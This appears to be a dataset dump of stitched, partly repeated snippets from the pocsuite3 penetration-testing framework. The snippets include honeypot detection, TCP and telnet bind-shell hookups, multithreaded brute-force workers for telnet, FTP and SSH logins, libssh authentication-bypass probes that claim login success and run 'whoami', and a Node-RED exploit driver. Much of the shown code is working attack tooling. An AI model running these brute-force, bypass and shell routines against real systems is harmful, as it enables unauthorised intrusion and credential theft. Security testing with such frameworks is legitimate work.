    # The user has not provided a port in URL, dynamically switching to HTTPS's default port 443
    pr = urlparse(self.url)
    is_ipv6 = pr.netloc.startswith('[')
    if ':' not in self.target.split('://')[-1] and pr.port == 80:
        pr = pr._replace(scheme='https')
        pr = pr._replace(netloc=f'[{pr.hostname}]:443' if is_ipv6 else f'{pr.hostname}:443')
        urls.add(pr.geturl())
    else:
        urls.add(f'https://{netloc}')
    for url in urls:
        try:
            time.sleep(0.1)
            res = requests.get(url, allow_redirects=allow_redirects)
            """
            https://github.com/knownsec/pocsuite3/issues/330
            https://github.com/knownsec/pocsuite3/issues/356
            status_code:
            - 20x
            - 30x
            - 40x
            - 50x
            """
            # if HTTPS handshake is successful, return directly
            if url.startswith('https://'):
                break
            # if we send an HTTP request to an HTTPS service, but the server may return 20x
            for k in redirect_https_keyword:
                if k.lower() in res.text.lower():
                    redirect_https_keyword_found = True
                    break
            if redirect_https_keyword_found:
                continue
            # if we send an HTTP request to an HTTPS service, the server may return 30x, 40x, or 50x...
            if not str(res.status_code).startswith('20'):
                continue
            break
        except requests.RequestException:
            pass
    if not isinstance(res, requests.Response):
        return False
    # adopt the URL that actually answered (pre-redirect when history exists)
    self.url = res.request.url.rstrip('/')
    if res.history:
        self.url = res.history[0].request.url.rstrip('/')
    if self.url.split('://')[0] != self.scheme:
        self.url = self.build_url(self.url)
        logger.warn(f'auto correct url: {mosaic(origin_url)} -> {mosaic(self.url)}')
    if return_obj:
        return res
    content = str(res.headers).lower() + res.text.lower()
    dork = dork.lower()
    if dork not in content:
        return False
    if not honeypot_check:
        return True
    is_honeypot = False
    # detect honeypot
    # https://www.zoomeye.org/searchResult?q=%22GoAhead-Webs%22%20%2B%22Apache-Coyote%22
    keyword = [
        'goahead-webs',
        'apache-coyote',
        'upnp/',
        'openresty',
        'tomcat'
    ]
    # several unrelated server banners in one response smells like a honeypot
    sin = 0
    for k in keyword:
        if k in content:
            sin += 1
    if sin >= 3:
        logger.debug(f'honeypot: sin({sin}) >= 3')
        is_honeypot = True
    # maybe some false positives
    elif len(re.findall('<title>(.*)</title>', content)) > 5:
        logger.debug('honeypot: too many title')
        is_honeypot = True
    elif len(re.findall('basic realm=', content)) > 5:
        logger.debug('honeypot: too many www-auth')
        is_honeypot = True
    elif len(re.findall('server: ', content)) > 5:
        logger.debug('honeypot: too many server')
        is_honeypot = True
    if is_honeypot:
        logger.warn(f'{mosaic(self.url)} is a honeypot.')
    return not is_honeypot
def _shell(self):
    """Shell-mode hook; concrete PoC classes must override this.

    An implementation should return an Output instance.
    """
    raise NotImplementedError
def _attack(self):
    """Attack-mode hook; concrete PoC classes must override this.

    An implementation should return an Output instance.
    """
    raise NotImplementedError
def _verify(self):
    """Verify-mode hook; concrete PoC classes must override this.

    An implementation should return an Output instance.
    """
    raise NotImplementedError
def parse_output(self, result=None):
    """Convert a PoC result dict into an Output instance.

    A truthy *result* marks the run as successful; anything else is
    reported as a failure.  The old signature used the mutable default
    ``result={}``; it is now ``None`` (same observable behaviour, since
    both are falsy, but without the shared-default pitfall).
    """
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output
def _run(self):
    """Generic run hook; concrete PoC classes must override this.

    An implementation should return an Output instance.
    """
    raise NotImplementedError
def random_str(length=10, chars=string.ascii_letters + string.digits):
    """Return a random string of *length* characters drawn from *chars*.

    Uses random.choices (sampling WITH replacement): characters may
    repeat, and lengths longer than len(chars) are supported.  The old
    random.sample-based version could never repeat a character and raised
    ValueError for length > len(chars).
    """
    return ''.join(random.choices(chars, k=length))
def bind_shell(obj, rce_func='_rce', check=True):
    """Hook a PoC's RCE callable up to the interactive listener.

    *obj* must be a POCBase instance exposing a callable named *rce_func*.
    When *check* is true, a random echo round-trip first confirms that
    command execution really works; on failure the function returns False.
    """
    if not isinstance(obj, POCBase):
        return False
    conn = getattr(obj, rce_func, None)
    if not callable(conn):
        return False
    if check:
        token = random_str(6).encode()
        if token not in read_results(conn, b'echo %s' % token):
            return False
    start_listener(conn)
161,761 | import os
import socket
import zlib
import pickle
import base64
import select
import telnetlib
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger
def read_results(conn, inputs):
    """Send a command over *conn* and collect its output as bytes.

    *conn* may be a telnetlib.Telnet session, a plain callable that runs
    the command and returns its output, or a connected socket.  For the
    stream transports a random sentinel is appended to the command line
    so the end of the output can be recognised.  Returns b'\\n' when
    nothing usable could be read.
    """
    if isinstance(conn, telnetlib.Telnet):
        flag = random_str(6).encode()
        # the bogus ';<flag>' trailer makes <flag> appear twice in the
        # stream (input echo + the shell's response to it), which is the
        # completion signal checked below
        inputs = inputs.strip() + b';' + flag + b'\n'
        results = b''
        conn.write(inputs)
        count = 10
        while count:
            count -= 1
            # a freshly generated sentinel will (practically) never match,
            # so this behaves as a 0.2 s bounded read per iteration
            chunk = conn.read_until(random_str(6).encode(), 0.2)
            if len(chunk) > 0:
                results += chunk
            if results.count(flag) >= 2:
                # remove the Telnet input echo
                results = results.split(inputs.strip())[-1]
                results = os.linesep.encode().join(
                    results.split(flag)[0].splitlines()[0:-1])
                return results.strip() + b'\n'
    elif callable(conn):
        # the callable runs the command itself; normalise its output to bytes
        results = conn(inputs.decode())
        if not isinstance(results, bytes):
            results = results.encode()
        if results.strip() == b'':
            results = b'COMMAND NO OUTPUT\n'
        return results
    elif isinstance(conn, socket.socket):
        flag = random_str(6).encode()
        inputs = inputs.strip() + b';' + flag + b'\n'
        conn.send(inputs)
        count = 10
        results = b''
        while count:
            count -= 1
            # poll the socket for up to 0.2 s per iteration
            ready = select.select([conn], [], [], 0.2)
            if ready[0]:
                chunk = conn.recv(1024)
                results += chunk
                if results.count(flag) >= 2:
                    break
        # strip the command echo and everything after the sentinel
        results = results.split(inputs.strip())[-1]
        results = os.linesep.encode().join(
            results.split(flag)[0].splitlines()[0:-1])
        return results.strip() + b'\n'
    return b'\n'
def start_listener(conn):
    """Spawn a daemon thread bridging *conn* to the interactive listener."""
    t = threading.Thread(target=flow_redirect,
                         name="bind-listener-thread",
                         args=[conn])
    # daemon=True so the helper thread never blocks interpreter shutdown;
    # Thread.setDaemon() is deprecated since Python 3.10 in favour of the
    # .daemon attribute
    t.daemon = True
    t.start()
def random_str(length=10, chars=string.ascii_letters + string.digits):
    """Return a random string of *length* characters drawn from *chars*.

    Uses random.choices (sampling WITH replacement): characters may
    repeat, and lengths longer than len(chars) are supported.  The old
    random.sample-based version could never repeat a character and raised
    ValueError for length > len(chars).
    """
    return ''.join(random.choices(chars, k=length))
def check_port(ip, port):
    """Return True when a TCP connection to (ip, port) succeeds."""
    info = socket.getaddrinfo(ip, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
    family, sock_type, proto, _canonname, sockaddr = info[0]
    probe = socket.socket(family, sock_type, proto)
    try:
        probe.connect(sockaddr)
        probe.shutdown(2)
    except socket.error:
        return False
    else:
        return True
    finally:
        # the probe socket is always released, whatever the outcome
        probe.close()
logger = LOGGER
def bind_tcp_shell(host, port, check=True):
    """Attach the interactive listener to a TCP bind-shell at host:port.

    Returns False when the port is unreachable or the optional echo
    round-trip fails; connection errors are logged and swallowed.
    """
    if not check_port(host, port):
        return False
    try:
        sock = socket.socket()
        sock.connect((host, port))
        if check:
            token = random_str(6).encode()
            if token not in read_results(sock, b'echo %s' % token):
                return False
        start_listener(sock)
    except Exception as exc:
        logger.error(str(exc))
161,762 | import os
import socket
import zlib
import pickle
import base64
import select
import telnetlib
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger
def read_results(conn, inputs):
def start_listener(conn):
def random_str(length=10, chars=string.ascii_letters + string.digits):
def check_port(ip, port):
logger = LOGGER
def bind_telnet_shell(host, port, user, pwd, check=True):
    """Log in to a telnet service and hand the session to the listener.

    Returns False when the port is closed or the post-login echo check
    fails; any telnet/login error is logged and swallowed.
    NOTE(review): relies on telnetlib, which was removed in Python 3.13.
    """
    if not check_port(host, port):
        return False
    try:
        session = telnetlib.Telnet(host, port)
        session.expect([b'Login: ', b'login: '], 10)
        session.write(user.encode() + b'\n')
        session.expect([b'Password: ', b'password: '], 10)
        session.write(pwd.encode() + b'\n')
        # an extra newline to flush the login sequence
        session.write(b'\n')
        if check:
            token = random_str(6).encode()
            if token not in read_results(session, b'echo %s' % token):
                return False
        start_listener(session)
    except Exception as exc:
        logger.error(str(exc))
161,763 | import os
import sys
import threading
import time
import traceback
from pocsuite3.lib.core.option import init
from pocsuite3.lib.core.option import init_options
from pocsuite3.lib.core.exception import PocsuiteUserQuitException, PocsuiteSystemException
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.common import set_paths
from pocsuite3.lib.core.common import banner
from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.parse.cmd import cmd_line_parser
from pocsuite3.lib.controller.controller import start
def module_path():
logger = LOGGER
def check_environment():
    """Abort when the installation path cannot be handled by the OS.

    Non-ASCII install paths can make path handling fail on some systems;
    detect that early and exit with a clear message.
    """
    try:
        os.path.isdir(module_path())
    except Exception:
        err_msg = ("your system does not properly handle non-ASCII paths. "
                   "Please move the pocsuite's directory to the other location")
        logger.critical(err_msg)
        raise SystemExit
161,764 | import itertools
import queue
import socket
import telnetlib
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads
def port_check(host, port=23):
    """Return True when TCP *port* on *host* accepts a connection.

    The probe socket is now closed on every path — the original leaked
    the socket whenever the connection succeeded.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        return s.connect_ex((host, int(port))) == 0
    finally:
        s.close()
def task_init(host, port):
    """Queue telnet login attempts for host:port from the wordlist.

    Each distinct username is first tried once with an empty password,
    then with its candidate password.
    """
    seen_users = set()
    for username, password in get_word_list():
        stripped_user = username.strip()
        if username not in seen_users:
            # the empty-password attempt is queued once per username
            task_queue.put((host, port, stripped_user, ''))
            seen_users.add(username)
        task_queue.put((host, port, stripped_user, password.strip()))
def task_thread():
    """Worker loop: pull (host, port, user, pass) tuples and try telnet logins.

    On a successful login the shared queue is flushed so sibling workers
    drain immediately, and the winning pair is pushed to result_queue.
    """
    while not task_queue.empty():
        host, port, username, password = task_queue.get()
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if telnet_login(host, port, username, password):
            # clearing the underlying deque under the queue's own mutex
            # stops the remaining workers without raising
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
    """Run *thread_function* across *num_threads* daemon threads and wait.

    With a single thread the function is simply called inline.  Global
    thread-state flags in ``kb`` are toggled around the run; Ctrl+C sets
    ``kb.thread_continue = False`` so cooperative workers can stop.
    """
    threads = []
    kb.multi_thread_mode = True
    kb.thread_continue = True
    kb.thread_exception = False
    try:
        if num_threads > 1:
            if start_msg:
                info_msg = "starting {0} threads".format(num_threads)
                logger.info(info_msg)
            if num_threads > MAX_NUMBER_OF_THREADS:
                warn_msg = f"starting {num_threads} threads, more than MAX_NUMBER_OF_THREADS: {MAX_NUMBER_OF_THREADS}"
                logger.warn(warn_msg)
        else:
            thread_function(*args)
            return
        # Start the threads
        # NOTE(review): the loop variable shadows the num_threads parameter;
        # it is only used for the thread name, but renaming it would be safer
        for num_threads in range(num_threads):
            thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
                                      args=(thread_function, args))
            # daemon threads cannot block interpreter exit
            # (Thread.setDaemon() is deprecated in favour of .daemon = True)
            thread.setDaemon(True)
            try:
                thread.start()
            except Exception as ex:
                err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
                logger.critical(err_msg)
                break
            threads.append(thread)
        # And wait for them to all finish
        # busy-wait instead of join() so KeyboardInterrupt is delivered promptly
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.is_alive():
                    alive = True
                    time.sleep(0.1)
    except (KeyboardInterrupt, PocsuiteUserQuitException):
        kb.thread_continue = False
        kb.thread_exception = True
        logger.info("user aborted (Ctrl+C was pressed multiple times")
        if forward_exception:
            return
    except (PocsuiteConnectionException, PocsuiteValueException) as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        if conf.verbose > 1:
            traceback.print_exc()
    except Exception as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        traceback.print_exc()
    finally:
        # always restore single-thread state, even after an exception
        kb.multi_thread_mode = False
        kb.thread_continue = True
        kb.thread_exception = False
def telnet_burst(host, port):
    """Kick off a telnet credential burst against host:port (best effort)."""
    if not port_check(host, port):
        return
    try:
        task_init(host, port)
        run_threads(1, task_thread)
    except Exception:
        # brute forcing is best-effort; swallow any worker failure
        pass
161,765 | import ftplib
import itertools
import queue
import socket
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads
result_queue = queue.Queue()
def port_check(host, port=21):
    """Return True when TCP *port* on *host* accepts a connection.

    The probe socket is now closed on every path — the original leaked
    the socket whenever the connection succeeded.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        return s.connect_ex((host, int(port))) == 0
    finally:
        s.close()
def anonymous_login(host, port):
    """Return the result of an anonymous FTP login attempt on host:port."""
    return ftp_login(host, port, anonymous=True)
def task_init(host, port):
    """Seed the shared task queue with every (user, password) candidate."""
    for username, password in get_word_list():
        task_queue.put((host, port, username.strip(), password.strip()))
def task_thread():
    """Worker loop: pull (host, port, user, pass) tuples and try FTP logins.

    On a successful login the shared queue is flushed so sibling workers
    drain immediately, and the winning pair is pushed to result_queue.
    """
    while not task_queue.empty():
        host, port, username, password = task_queue.get()
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if ftp_login(host, port, username, password):
            # clearing the underlying deque under the queue's own mutex
            # stops the remaining workers without raising
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
    """Run *thread_function* across *num_threads* daemon threads and wait.

    With a single thread the function is simply called inline.  Global
    thread-state flags in ``kb`` are toggled around the run; Ctrl+C sets
    ``kb.thread_continue = False`` so cooperative workers can stop.
    """
    threads = []
    kb.multi_thread_mode = True
    kb.thread_continue = True
    kb.thread_exception = False
    try:
        if num_threads > 1:
            if start_msg:
                info_msg = "starting {0} threads".format(num_threads)
                logger.info(info_msg)
            if num_threads > MAX_NUMBER_OF_THREADS:
                warn_msg = f"starting {num_threads} threads, more than MAX_NUMBER_OF_THREADS: {MAX_NUMBER_OF_THREADS}"
                logger.warn(warn_msg)
        else:
            thread_function(*args)
            return
        # Start the threads
        # NOTE(review): the loop variable shadows the num_threads parameter;
        # it is only used for the thread name, but renaming it would be safer
        for num_threads in range(num_threads):
            thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
                                      args=(thread_function, args))
            # daemon threads cannot block interpreter exit
            # (Thread.setDaemon() is deprecated in favour of .daemon = True)
            thread.setDaemon(True)
            try:
                thread.start()
            except Exception as ex:
                err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
                logger.critical(err_msg)
                break
            threads.append(thread)
        # And wait for them to all finish
        # busy-wait instead of join() so KeyboardInterrupt is delivered promptly
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.is_alive():
                    alive = True
                    time.sleep(0.1)
    except (KeyboardInterrupt, PocsuiteUserQuitException):
        kb.thread_continue = False
        kb.thread_exception = True
        logger.info("user aborted (Ctrl+C was pressed multiple times")
        if forward_exception:
            return
    except (PocsuiteConnectionException, PocsuiteValueException) as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        if conf.verbose > 1:
            traceback.print_exc()
    except Exception as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        traceback.print_exc()
    finally:
        # always restore single-thread state, even after an exception
        kb.multi_thread_mode = False
        kb.thread_continue = True
        kb.thread_exception = False
def ftp_burst(host, port):
    """Brute-force FTP credentials on host:port, trying anonymous first."""
    if not port_check(host, port):
        return
    # anonymous access short-circuits the whole wordlist
    if anonymous_login(host, port):
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, 'anonymous', '<empty>'))
        result_queue.put(('anonymous', '<empty>'))
        return
    try:
        task_init(host, port)
        run_threads(4, task_thread)
    except Exception:
        # brute forcing is best-effort; swallow any worker failure
        pass
161,766 | import asyncio
import json
import re
import websockets
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.lib.utils import random_str
def need_auth(url):
def login(url, username="admin", password="password"):
async def exploit(url, command, shell=False, access_token=None):
def start(url, command, username, password, shell=False):
    """Drive the Node-RED exploit: authenticate if required, then run *command*.

    Tries default credentials when neither username nor password is given.
    Returns the exploit coroutine's result, or None on login failure.
    """
    if not need_auth(url):
        print("[+] Node-RED does not require authentication.")
        return asyncio.get_event_loop().run_until_complete(exploit(url, command, shell))
    print("[+] Node-RED requires authentication.")
    if username is None and password is None:
        print("[+] Trying default credentials.")
        access_token = login(url)
    else:
        print("[+] Trying provided credentials.")
        access_token = login(url, username=username, password=password)
    if access_token is None:
        print("[!] An error occured during login procedure. Wrong creds ?")
        return
    print("[+] Successfully authenticated over HTTP.")
    return asyncio.get_event_loop().run_until_complete(exploit(url, command, shell, access_token))
161,767 | import os
import socket
import paramiko
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
def password_auth_bypass_test(hostname, port):
    """libssh auth-bypass probe: claim userauth success without credentials.

    Sends an unsolicited MSG_USERAUTH_SUCCESS to the server, then tries to
    run ``whoami``; returns True when the output contains 'root'.
    """
    read_size = 2048
    probe_cmd = 'whoami'
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))
        msg = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
        # skip authentication entirely: tell the server auth already succeeded
        msg.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(msg)
        channel = transport.open_session(timeout=10)
        channel.exec_command(probe_cmd)
        out = channel.makefile("rb", read_size)
        err = channel.makefile_stderr("rb", read_size)
        cmd_out = out.read().decode() + err.read().decode()
        print(cmd_out)
        return 'root' in cmd_out
    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
161,768 | import os
import socket
import paramiko
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
def auth_accept(*args, **kwargs):
    """Handler shim that treats any auth request as an immediate success.

    Delegates to paramiko's client-side MSG_USERAUTH_SUCCESS handler so a
    patched AuthHandler table accepts authentication unconditionally.
    """
    new_auth_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_SUCCESS]
    return new_auth_accept(*args, **kwargs)
def fake_key_bypass_test(hostname, port, username='root', keyfile=None, command='whoami'):
    """SSH auth-bypass probe using a monkey-patched paramiko handler table.

    Patches the server handler table so any USERAUTH_REQUEST is accepted,
    connects with an arbitrary key, runs *command*, and returns True when
    it executes as root.

    Fix: ``stdout.read()`` returns *bytes* with a trailing newline; the
    original compared it to the str ``'root'``, which was always False.
    The output is now decoded and stripped before comparison.
    """
    try:
        if keyfile is None:
            keyfile = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa')
        # accept any auth request on the (patched) server-side handler table
        paramiko.auth_handler.AuthHandler._server_handler_table.update(
            {paramiko.common.MSG_USERAUTH_REQUEST: auth_accept})
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile)
        stdin, stdout, stderr = client.exec_command(command)
        cmd_output = stdout.read()
        client.close()
        return cmd_output.decode().strip() == 'root'
    except FileNotFoundError:
        logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.")
        return False
    except paramiko.SSHException:
        logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
        return False
    except socket.error:
        logger.debug("Unable to connect.")
        return False
161,769 | import itertools
import logging
import queue
import socket
from collections import OrderedDict
import paramiko
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.interpreter_option import OptInteger
from pocsuite3.lib.core.threads import run_threads
def port_check(host, port=22):
    """Return True when TCP *port* on *host* accepts a connection.

    The probe socket is now closed on every path — the original leaked
    the socket whenever the connection succeeded.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        return s.connect_ex((host, int(port))) == 0
    finally:
        s.close()
def task_init(host, port, task_queue, reqult_queue):
    """Seed *task_queue* with every (host, port, user, password) candidate.

    NOTE(review): the *reqult_queue* parameter (sic) is unused; the name
    is kept so existing positional calls stay valid.
    """
    for username, password in get_word_list():
        task_queue.put((host, port, username.strip(), password.strip()))
def task_thread(task_queue, result_queue):
    """Worker loop: pull (host, port, user, pass) tuples and try SSH logins.

    On a successful login the queue is flushed so sibling workers drain
    immediately, and the winning pair is pushed to *result_queue*.
    """
    while not task_queue.empty():
        host, port, username, password = task_queue.get()
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if ssh_login(host, port, username, password):
            # clearing the underlying deque under the queue's own mutex
            # stops the remaining workers without raising
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
    """Run *thread_function* across *num_threads* daemon threads and wait.

    With a single thread the function is simply called inline.  Global
    thread-state flags in ``kb`` are toggled around the run; Ctrl+C sets
    ``kb.thread_continue = False`` so cooperative workers can stop.
    """
    threads = []
    kb.multi_thread_mode = True
    kb.thread_continue = True
    kb.thread_exception = False
    try:
        if num_threads > 1:
            if start_msg:
                info_msg = "starting {0} threads".format(num_threads)
                logger.info(info_msg)
            if num_threads > MAX_NUMBER_OF_THREADS:
                warn_msg = f"starting {num_threads} threads, more than MAX_NUMBER_OF_THREADS: {MAX_NUMBER_OF_THREADS}"
                logger.warn(warn_msg)
        else:
            thread_function(*args)
            return
        # Start the threads
        # NOTE(review): the loop variable shadows the num_threads parameter;
        # it is only used for the thread name, but renaming it would be safer
        for num_threads in range(num_threads):
            thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
                                      args=(thread_function, args))
            # daemon threads cannot block interpreter exit
            # (Thread.setDaemon() is deprecated in favour of .daemon = True)
            thread.setDaemon(True)
            try:
                thread.start()
            except Exception as ex:
                err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
                logger.critical(err_msg)
                break
            threads.append(thread)
        # And wait for them to all finish
        # busy-wait instead of join() so KeyboardInterrupt is delivered promptly
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.is_alive():
                    alive = True
                    time.sleep(0.1)
    except (KeyboardInterrupt, PocsuiteUserQuitException):
        kb.thread_continue = False
        kb.thread_exception = True
        logger.info("user aborted (Ctrl+C was pressed multiple times")
        if forward_exception:
            return
    except (PocsuiteConnectionException, PocsuiteValueException) as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        if conf.verbose > 1:
            traceback.print_exc()
    except Exception as ex:
        kb.thread_exception = True
        logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
        traceback.print_exc()
    finally:
        # always restore single-thread state, even after an exception
        kb.multi_thread_mode = False
        kb.thread_continue = True
        kb.thread_exception = False
def ssh_burst(host, port, task_queue, result_queue, ssh_burst_threads):
    """Brute-force SSH credentials on host:port with a pool of workers."""
    # paramiko is chatty; keep only critical messages
    paramiko.util.logging.getLogger().setLevel(logging.CRITICAL)
    if not port_check(host, port):
        logger.warning("{}:{} is unreachable".format(host, port))
        return
    try:
        task_init(host, port, task_queue, result_queue)
        run_threads(ssh_burst_threads, task_thread, args=(task_queue, result_queue))
    except Exception:
        # brute forcing is best-effort; swallow any worker failure
        pass
161,770 | from collections import OrderedDict
from pocsuite3.api import (
Output,
POCBase,
POC_CATEGORY,
register_poc,
requests,
VUL_TYPE,
get_listener_ip,
get_listener_port,
)
from pocsuite3.lib.core.interpreter_option import (
OptString,
OptDict,
OptIP,
OptPort,
OptBool,
OptInteger,
OptFloat,
OptItems,
)
from pocsuite3.modules.listener import REVERSE_PAYLOAD
def other_fuc():
    """Placeholder function; intentionally does nothing."""
    pass
161,771 | from collections import OrderedDict
from pocsuite3.api import (
Output,
POCBase,
POC_CATEGORY,
register_poc,
requests,
VUL_TYPE,
get_listener_ip,
get_listener_port,
)
from pocsuite3.lib.core.interpreter_option import (
OptString,
OptDict,
OptIP,
OptPort,
OptBool,
OptInteger,
OptFloat,
OptItems,
)
from pocsuite3.modules.listener import REVERSE_PAYLOAD
def other_utils_func():
    """Placeholder function; intentionally does nothing."""
    pass
161,772 | from pocsuite3.lib.utils import urlparse
class URL:
    """Decoded view of a parsed URL, with scheme-based default ports.

    All component arguments arrive as bytes (or a falsy placeholder) and
    are decoded to str; a missing port falls back to 443 for https and
    80 otherwise.
    """

    def __init__(self, schema: bytes, host: bytes, port, path: bytes,
                 query: bytes, fragment: bytes, userinfo: bytes):
        self.schema = schema.decode('utf-8')
        self.host = host.decode('utf-8')
        # fall back to the scheme's well-known port when none is given
        if port:
            self.port = port
        else:
            self.port = 443 if schema == b'https' else 80
        self.path = path.decode('utf-8') if path else ''
        self.query = query.decode('utf-8') if query else None
        self.fragment = fragment.decode('utf-8') if fragment else None
        self.userinfo = userinfo.decode('utf-8') if userinfo else None
        self.netloc = '{}://{}:{}'.format(self.schema, self.host, self.port)

    def raw(self):
        """Reassemble the URL string: netloc + path + query + fragment."""
        pieces = [self.netloc, self.path or '', self.query or '', self.fragment or '']
        return ''.join(pieces)

    def __repr__(self):
        return ('<URL schema: {!r}, host: {!r}, port: {!r}, path: {!r}, '
                'query: {!r}, fragment: {!r}, userinfo: {!r}>'
                .format(self.schema, self.host, self.port, self.path, self.query, self.fragment, self.userinfo))
def urlparse(address):
    """Parse *address*, defaulting to a tcp:// scheme when none is present.

    Bare IPv4/IPv6 addresses are wrapped first so urllib does not
    mis-split them (IPv6 literals get brackets).
    """
    # https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url
    try:
        ip = ip_address(address)
    except ValueError:
        pass
    else:
        wrapped = f'tcp://{address}' if ip.version == 4 else f'tcp://[{address}]'
        return urllib.parse.urlparse(wrapped)
    if re.search(r'^[A-Za-z0-9+.\-]+://', address) is None:
        address = f'tcp://{address}'
    return urllib.parse.urlparse(address)
def parse_url(url):
    """Parse *url* into a URL instance.

    Fixes over the original implementation:
    * the userinfo was built from the *literal* bytes
      ``b'{parsed.username}:{parsed.password}'`` — the f-prefix was
      missing (and bytes literals cannot be f-strings anyway), so it was
      never interpolated; it is now rendered from the parsed credentials,
      or None when the URL carries none;
    * urlparse yields str components while URL() decodes bytes, so each
      field is encoded before being handed over;
    * parse failures raised a bare string (itself a TypeError); they now
      raise a proper ValueError.
    """
    try:
        parsed = urlparse(url)

        def to_bytes(value):
            # URL() expects bytes (or a falsy placeholder) for each field
            return value.encode('utf-8') if isinstance(value, str) else value

        userinfo = None
        if parsed.username is not None:
            userinfo = f'{parsed.username}:{parsed.password}'.encode('utf-8')
        return URL(to_bytes(parsed.scheme), to_bytes(parsed.hostname), parsed.port,
                   to_bytes(parsed.path), to_bytes(parsed.query), to_bytes(parsed.fragment), userinfo)
    except Exception as exc:
        raise ValueError("invalid url {!r}".format(url)) from exc
161,773 | import argparse
import os
import sys
from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.settings import IS_WIN, CMD_PARSE_WHITELIST
def data_to_stdout(data, bold=False):
    """
    Writes text to the stdout (console) stream
    """
    # honour --quiet: suppress all console output
    if not conf.get('quiet', False):
        message = ""
        if isinstance(data, str):
            # re-encode for the console's codec before writing
            message = stdout_encode(data)
        else:
            message = data
        sys.stdout.write(set_color(message, bold))
        try:
            sys.stdout.flush()
        except IOError:
            # a broken/closed stdout pipe is not fatal
            pass
    return
IS_WIN = True if (sys.platform in ["win32", "cygwin"] or os.name == "nt") else False
CMD_PARSE_WHITELIST = [
"help",
"version",
"update",
"new",
"url",
"url_file",
"ports",
"skip_target_port",
"file",
"poc_keyword",
"poc_list",
"verify",
"attack",
"shell",
"cookie",
"host",
"referer",
"user-agent",
"proxy",
"proxy-cred",
"timeout",
"retry",
"delay",
"headers",
"http-debug",
"ceye-token",
"oob-server",
"oob-token",
"seebug-token",
"zoomeye-token",
"shodan-token",
"fofa-user",
"fofa-token",
"quake-token",
"hunter-token",
"censys-uid",
"censys-secret",
"dork",
"dork-zoomeye",
"dork-shodan",
"dork-fofa",
"dork-quake",
"dork-hunter",
"dork-censys",
"max-page",
"search-type",
"vul-keyword",
"ssv-id",
"lhost",
"lport",
"tls",
"comparison",
"dork-b64",
"output_path",
"plugins",
"pocs-path",
"threads",
"batch",
"requires",
"quiet",
"ppt",
"pcap",
"rule",
"rule-req",
"rule-filename",
"no-check",
"options",
# docker
